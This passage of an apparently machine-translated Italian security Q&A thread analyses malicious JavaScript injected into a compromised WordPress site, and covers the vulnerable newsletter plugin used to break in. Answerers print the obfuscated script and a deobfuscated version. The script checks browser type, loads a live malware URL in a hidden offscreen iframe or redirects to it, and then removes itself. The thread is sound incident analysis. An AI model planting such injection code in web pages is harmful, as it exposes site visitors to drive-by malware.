        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {


if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;
                    left:-2630px;
                    \"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}

Che è ancora offuscato un po 'usando il nome della variabile "random". Ancora puoi vedere che il codice sta tentando di reindirizzare a:

hxxp://miwkavoriwka.ml/052F

Qualcuno sa a cosa serve questo sito?

    
risposta data 15.10.2015 - 15:41
fonte
17

Ho deobfuscato un po 'il codice:

var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// some capability check
// POssible another mobile phone check ?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_edge_index = user_agent.indexOf("Edge/");
    if (user_agent_edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_edge_index + 5, user_agent.indexOf(".", user_agent_edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}

Carica h ** p: //miwkavoriwka.ml/052F (che è già presente in alcune blacklist, elenco FF incluso di protezione da phishing e malware) in un iframe o reindirizza a quell'URL (a seconda del browser)

modifica Dopo aver letto il codice un po ': L'unico browser che sembra essere mirato sono quelli in cui sono soddisfatte queste condizioni:

  • Useragents contenenti MSIE , Trident / o Edge /
  • Nessun telefono cellulare? (vedi la funzione is_mobile_phone )
  • Alcune funzionalità di controllo vero (vedi funzione some_capability_check )
risposta data 15.10.2015 - 16:06
fonte
12

Grazie per tutte le fantastiche informazioni e aiuto!

Da allora ho scoperto come il sito è stato inizialmente violato. Il sito utilizzava una vecchia versione del plugin Mailpoet / wysija-newsletters (pre 2.6.7)

Utilizzando un exploit in questo plug-in, l'autore dell'attacco è riuscito a caricare il codice dannoso che è stato poi utilizzato per infettare ulteriormente il sito.

link

In definitiva il problema di sicurezza con Mailpoet / wysija-newsletters è stato usato per caricare un file chiamato .zip in / wp-content / uploads / wysija / temp e quindi estrarre il file zip e installare alcuni temi oscuri. Lo screenshot allegato mostra cosa è successo quando si entra nella pagina di amministrazione dei plugin dopo che lo zip è stato cancellato. Sembra che ogni volta che entri in wp-admin il sito venga reinfettato.

Il sito è stato ripristinato da una versione pulita, completamente aggiornata e il plugin WordFence è in esecuzione.

    
risposta data 16.10.2015 - 14:01
fonte
6

È scopo apparente è di infettare wp-settings.php , quindi infetta tutte le tue pagine e collega il malware attraverso un iframe.

Puoi rimuoverlo eliminando wp_inc/upd.php , ma ciò non risolverà il vettore di minaccia a meno che quel buco non sia tappato. Tuttavia, la "principale infezione" stessa può trovarsi in un file diverso, se i commenti sono corretti. Di nuovo, rimuovere questo file non sarà di grande aiuto se il vettore delle minacce è ancora lì.

Una persona anche suggerito di sostituire eval con alert . Altri hanno già debianizzato altre versioni utilizzando le tecniche descritte in questa discussione . Il tuo codice segue uno schema molto simile a quello.

    
risposta data 15.10.2015 - 15:39
fonte

Leggi altre domande sui tag